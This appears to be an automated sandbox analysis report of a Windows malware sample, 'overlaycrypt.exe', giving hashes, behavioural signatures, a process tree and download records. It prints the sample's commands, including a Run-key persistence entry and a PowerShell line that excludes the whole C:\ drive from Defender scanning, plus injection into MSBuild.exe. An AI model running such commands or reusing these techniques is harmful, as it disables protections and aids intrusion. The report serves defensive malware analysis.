Analysis
  max time kernel: 139s
  max time network: 147s
  platform: windows10-2004_x64
  resource: win10v2004-20230703-en
  resource tags: arch:x64, arch:x86, image:win10v2004-20230703-en, locale:en-us, os:windows10-2004-x64, system
  submitted: 07/08/2023, 06:15
Static task: static1
Behavioral task: behavioral1
  Sample: overlaycrypt.exe
  Resource: win7-20230712-en
Behavioral task: behavioral2
  Sample: overlaycrypt.exe
  Resource: win10v2004-20230703-en
General
  Target: overlaycrypt.exe
  Size: 846KB
  MD5: 0f6ffc2e70d312972d592fd43d49b10c
  SHA1: 1be29b9bf2da79e428f3e2ed95b25880b72cbc0c
  SHA256: 7bcde76356cbd428ffd4fd3288f1f07d49db7d3d772b9671bfa2bb1f98a3ae17
  SHA512: 71daeb9d2c213caf896a0cfcad6336c29e5c0645248fd26805ffa915ec69886639c704a4b3e1c6cd9c1412dbfff041d8efc7b60aeae69ae79a18aa81d0f4a600
  SSDEEP: 12288:nByKFBp5YVGAVUOJNcTUW91MPSNZm6wZUkmLB7j/QFU0u0cql03za+9rSdfDG:EKrp5YoOJ41MCzwZU3LG9/2DayufD
Malware Config
Signatures
  Adds Run key to start application (2 TTPs, 1 IoC)
    Set value (str): \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NetworkService = "C:\\Users\\Admin\\AppData\\Roaming\\NetworkService.exe" (process: overlaycrypt.exe)
  Suspicious use of SetThreadContext (1 IoC)
    PID 4504 (overlaycrypt.exe) set thread context of PID 3048 (procid_target 89)
  Drops file in Windows directory (2 IoCs)
    File opened for modification: C:\Windows\LOGS\DPX\setupact.log (process: expand.exe)
    File opened for modification: C:\Windows\LOGS\DPX\setuperr.log (process: expand.exe)
  Enumerates physical storage devices (1 TTP)
    Attempts to interact with connected storage/optical drive(s).
  Suspicious behavior: EnumeratesProcesses (38 IoCs)
    PID 4504 overlaycrypt.exe (1 event); PID 2336 powershell.exe (2 events); PID 3048 MSBuild.exe (all remaining events)
  Suspicious behavior: GetForegroundWindowSpam (1 IoC)
    PID 3048 MSBuild.exe
  Suspicious use of AdjustPrivilegeToken (2 IoCs)
    Token: SeDebugPrivilege, PID 4504 overlaycrypt.exe
    Token: SeDebugPrivilege, PID 2336 powershell.exe
  Suspicious use of WriteProcessMemory (28 IoCs, grouped by writer and target)
    PID 4504 overlaycrypt.exe wrote to memory of PID 4024 (procid_target 86): 3 events
    PID 4024 cmd.exe wrote to memory of PID 2336 (procid_target 88): 3 events
    PID 4504 overlaycrypt.exe wrote to memory of PID 3048 (procid_target 89): 10 events
    PID 3048 MSBuild.exe wrote to memory of PID 1904 (procid_target 91): 3 events
    PID 1904 cmd.exe wrote to memory of PID 4728 (procid_target 93): 3 events
    PID 3048 MSBuild.exe wrote to memory of PID 3136 (procid_target 97): 3 events
    PID 3136 cmd.exe wrote to memory of PID 2844 (procid_target 99): 3 events
Processes (indentation shows parent/child nesting)
  C:\Users\Admin\AppData\Local\Temp\overlaycrypt.exe (PID 4504)
    Command line: "C:\Users\Admin\AppData\Local\Temp\overlaycrypt.exe"
    - Adds Run key to start application
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\cmd.exe (PID 4024)
      Command line: "C:\Windows\System32\cmd.exe" /c powershell set-mppreference -exclusionpath C:\
      - Suspicious use of WriteProcessMemory
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 2336)
        Command line: powershell set-mppreference -exclusionpath C:\
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe (PID 3048)
      Command line: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious behavior: GetForegroundWindowSpam
      - Suspicious use of WriteProcessMemory
      C:\Windows\SysWOW64\cmd.exe (PID 1904)
        Command line: /c ""C:\Windows\System32\curl.exe" --output "C:\Users\Admin\AppData\Local\TE1NTUVR\temp.cab" --url https://msedge.sf.dl.delivery.mp.microsoft.com/filestreamingservice/files/f29ffab2-0ad8-427f-8002-e8d6568524f1/Microsoft.WebView2.FixedVersionRuntime.107.0.1418.42.x86.cab"
        - Suspicious use of WriteProcessMemory
        C:\Windows\SysWOW64\curl.exe (PID 4728)
          Command line: "C:\Windows\System32\curl.exe" --output "C:\Users\Admin\AppData\Local\TE1NTUVR\temp.cab" --url https://msedge.sf.dl.delivery.mp.microsoft.com/filestreamingservice/files/f29ffab2-0ad8-427f-8002-e8d6568524f1/Microsoft.WebView2.FixedVersionRuntime.107.0.1418.42.x86.cab
      C:\Windows\SysWOW64\cmd.exe (PID 3136)
        Command line: /c ""C:\Windows\System32\expand.exe" "C:\Users\Admin\AppData\Local\TE1NTUVR\temp.cab" -F:* "C:\Users\Admin\AppData\Local\TE1NTUVR""
        - Suspicious use of WriteProcessMemory
        C:\Windows\SysWOW64\expand.exe (PID 2844)
          Command line: "C:\Windows\System32\expand.exe" "C:\Users\Admin\AppData\Local\TE1NTUVR\temp.cab" -F:* "C:\Users\Admin\AppData\Local\TE1NTUVR"
          - Drops file in Windows directory
Network
MITRE ATT&CK Enterprise v15
Downloads
  -
    Filesize: 60B
    MD5: d17fe0a3f47be24a6453e9ef58c94641
    SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
    SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
    SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
  -
    Filesize: 173.8MB
    MD5: 56d897c072901d6f6ab953b650ddb5a8
    SHA1: 304b6bff606a2bfe3610de4015acef2f74aaeab6
    SHA256: 5fe632de6bf14adde890b7ac74c62d3e493807858e5fa2e697898af8696cd698
    SHA512: 4f631e5cca2c0c9f9c6347e2cf31933cf59aba098613ce6e4551685cdf47d1c3cc4d833020b85c59b35c150c5b5c032efa653b90b6bed4359ff43eacf7e39c5e